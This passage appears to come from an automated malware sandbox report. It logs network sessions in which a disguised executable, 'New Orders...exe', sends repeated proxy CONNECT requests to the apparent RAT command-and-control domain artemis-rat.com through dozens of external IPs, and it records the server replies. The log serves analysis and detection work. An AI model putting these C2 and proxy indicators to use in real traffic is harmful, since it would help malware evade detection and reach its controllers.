                                                                                        Mar 11, 2024 16:16:39.989109039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.143763065 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        102192.168.2.95022031.43.179.214807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.990556002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.145170927 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        103192.168.2.950229172.67.150.173807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.993401051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.147897005 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        104192.168.2.95021466.225.246.23880807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.993406057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.155179977 CET731INHTTP/1.1 405 Not Allowed
                                                                                        Server: nginx/1.22.1
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Content-Length: 559
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.22.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        105192.168.2.950243104.17.171.235807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.008374929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.163188934 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        106192.168.2.950030111.8.155.5477777672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.013787985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.436764002 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        107192.168.2.95018272.10.164.178134777672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.016097069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.967000961 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        108192.168.2.950143184.181.217.19441457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.017602921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        109192.168.2.95008049.228.131.16950007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.018537998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        110192.168.2.950254172.67.182.126807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.019830942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.174350977 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        111192.168.2.950205199.102.107.14541457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.039747953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        112192.168.2.950051103.96.38.161807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.042766094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        113192.168.2.950173174.75.211.22241457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.045425892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        114192.168.2.950096218.6.120.11177777672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.047543049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.819910049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.422952890 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        115192.168.2.950275172.67.181.129807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.048341990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.202667952 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        116192.168.2.95007493.171.220.22988887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.052809000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.835602999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        117192.168.2.950285104.17.166.210807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.059689045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.213901997 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        118192.168.2.95025654.212.22.16810807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.059823990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.905873060 CET65INHTTP/1.1 200 Connection Established
                                                                                        Content-Type: text/plain


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        119192.168.2.95016267.213.212.50592687672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.060539961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.032785892 CET24INHTTP/1.1 200 #string


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        120192.168.2.95012343.133.136.20888007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.070391893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        121192.168.2.950180185.217.136.6713377672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.084455967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.384337902 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        122192.168.2.950058202.166.219.8041537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.093334913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        123192.168.2.95027612.176.231.147807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.100200891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.306298971 CET169INHTTP/1.0 400 Bad request
                                                                                        cache-control: no-cache
                                                                                        content-type: text/html
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                        Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        124192.168.2.95020713.208.168.17931287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.105181932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.381025076 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        125192.168.2.950305104.18.161.122807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.154318094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.309286118 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
